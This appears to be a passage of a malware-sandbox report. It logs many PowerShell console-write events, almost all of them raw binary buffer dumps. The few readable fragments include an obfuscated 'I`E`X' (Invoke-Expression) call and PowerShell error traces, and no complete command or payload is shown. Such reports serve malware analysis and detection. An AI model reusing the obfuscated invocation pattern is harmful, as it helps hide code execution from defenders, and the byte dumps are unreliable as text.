          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....Y%.............................}..v.....Y%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P`%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....a%.............................}..v.....a%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....Ph%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....i%.............................}..v.....i%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....Pp%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....q%.............................}..v.....q%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....Px%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....y%.............................}..v.....y%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X... .n.............................}..v....8.%.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v....p.%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....8.&.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......&.............................}..v....p.&.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v......&.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......&.............................}..v....@.&.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....h.&.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.... .&.............................}..v......&.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ......."90k.... .n.............................}..v....0.&.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......&.............................}..v....h.&.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v......4.....0.......................X.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v....@.4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.5.............}..v....P.4.....0................Gn.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................0k.....Jn.............................}..v....P.4.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............R.0k......4.............................}..v......4.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P$5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....%5.............................}..v.....%5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P,5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....-5.............................}..v.....-5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P45.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....55.............................}..v.....55.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P<5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....=5.............................}..v.....=5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....PD5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....E5.............................}..v.....E5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....PL5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....M5.............................}..v.....M5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....PT5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....U5.............................}..v.....U5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P\5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....]5.............................}..v.....]5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....Pd5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....e5.............................}..v.....e5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....Pl5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....m5.............................}..v.....m5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....Pt5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....u5.............................}..v.....u5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P|5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....}5.............................}..v.....}5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.5.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......5.............................}..v......5.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......6.............................}..v......6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......6.............................}..v......6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......6.............................}..v......6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P.6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k......6.............................}..v......6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P$6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....%6.............................}..v.....%6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P,6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....-6.............................}..v.....-6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....Jn.............................}..v....P46.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k.....56.............................}..v.....56.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................0k.....Jn.............................}..v....P<6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............R.0k.....=6.............................}..v.....=6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................0k.....Jn.............................}..v....PD6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............R.0k.....E6.............................}..v.....E6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................0k.....Jn.............................}..v....PL6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............R.0k.....M6.............................}..v.....M6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................0k.....Jn.............................}..v....PT6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............R.0k.....U6.............................}..v.....U6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.......).|.I.`.E.`.X....Jn.............................}..v....8Y6.....0................Gn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............R.0k.....Y6.............................}..v....pZ6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................0k.....Jn.............................}..v....8a6.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............R.0k.....a6.............................}..v....pb6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .a.d.a.t.a.E.x.c.e.p.t.i.o.n...............}..v.....f6.....0................Gn.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............R.0k....8g6.............................}..v.....g6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................0k.....Jn.............................}..v.....l6.....0.......................\.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............R.0k.....m6.............................}..v.....n6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........0k.....Jn.............................}..v.....q6.....0................Gn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................R.0k....Xr6.............................}..v.....r6.....0...............HHn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....+H.....0.......................~.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k....................................}..v.....-H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v.....1H.....0................jn.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....1H.............................}..v....H2H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....9H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....9H.............................}..v....H:H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....AH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....AH.............................}..v....HBH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....IH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....IH.............................}..v....HJH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....QH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....QH.............................}..v....HRH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....YH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....YH.............................}..v....HZH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....aH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....aH.............................}..v....HbH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....iH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....iH.............................}..v....HjH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....qH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....qH.............................}..v....HrH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....yH.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....yH.............................}..v....HzH.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C.................0k.....nn.............................}..v......H.....0...............................................
